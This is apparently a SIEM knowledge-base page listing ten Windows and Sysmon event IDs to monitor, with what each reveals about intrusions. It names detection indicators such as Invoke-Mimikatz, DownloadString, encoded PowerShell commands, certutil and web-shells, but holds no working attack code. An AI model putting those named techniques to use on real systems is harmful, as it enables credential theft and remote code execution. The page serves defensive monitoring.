TOP 10 Events to Monitor

This table outlines the top 10 critical Windows security events to monitor for detecting threats in SIEM systems

Log / Event ID

Event Name

Description & Usefulness

Security 4688 Sysmon 1

New Process Creation

Tracks the start of new processes. Helps detect: - Suspicious/unknown executables. - Malicious command-line arguments. - Abuse of LOLBAS (Living Off the Land Binaries and Scripts).

Security 4624

Successful Logon

Monitors successful authentications, including anomalies: - Logons from unusual hosts (e.g., unexpected geolocations). - Unusual logon methods (e.g., network logons for non-service accounts).

Security 4625

Failed Logon Attempt

Detects brute-force (targeting a single account) or password spraying (testing one password across multiple accounts). Correlate with Event ID 4624 to identify successful logons after multiple failures.

Security 5140, 5145

Network Resource Access

Tracks access to network resources (files, folders, named pipes). Critical for detecting lateral movement via RPC or SMB.

Security 5156 Sysmon 3

Network Connection Filtering

Shows allowed/established network connections. Check for: - Unusual IP addresses/ports (e.g., C2 servers). - Connections to non-standard services (e.g., SSH on Windows).

Security 4103/4104

PowerShell Script/Command Execution

Logs PowerShell script blocks and commands. Analyze script content for: - Obfuscated code (e.g., -EncodedCommand). - Malicious cmdlets (e.g., Invoke-Mimikatz, DownloadString).

Security 4697 System 7045

Service Installation

Monitors new service creation or configuration changes. Often abused for: - Persistence (e.g., malicious services). - Privilege escalation (e.g., services running as SYSTEM).

Security 4698

Scheduled Task Creation

Tracks new tasks in the Task Scheduler. Common in: - Persistence mechanisms. - Execution of malicious payloads at specific times.

Security 4720

User Account Creation

Alerts on new local/domain user accounts. After detection: - Check group membership changes. - Verify privilege assignments (e.g., sudden admin rights).

Sysmon 12/13

Registry Key Creation/Modification

Monitors registry changes. Critical for detecting: - Persistence (e.g., Run keys). - Configuration tampering (e.g., disabling security tools).

Sysmon 11

File Creation

Tracks file creation events. Use to detect: - Web-shells (e.g., .aspx in web directories). - Malware drops (e.g., .exe in Temp folders).

Windows Security Log Reference

For detailed descriptions of all security events, see:

LogoWindows Security Log Encyclopedia

Key Technical Terms:

  • LOLBAS: Living Off the Land Binaries and Scripts (e.g., certutil.exe, bitsadmin).

  • RPC: Remote Procedure Call (common in lateral movement).

  • C2: Command and Control (malware communication).

  • SMB: Server Message Block (protocol for file sharing).

Let me know if you need more! 🔍

PreviousEssential SIEM Rules to Start WithNextEvent ID 4624: Paired Sessions, Integrity Levels, and UAC

Last updated

Was this helpful?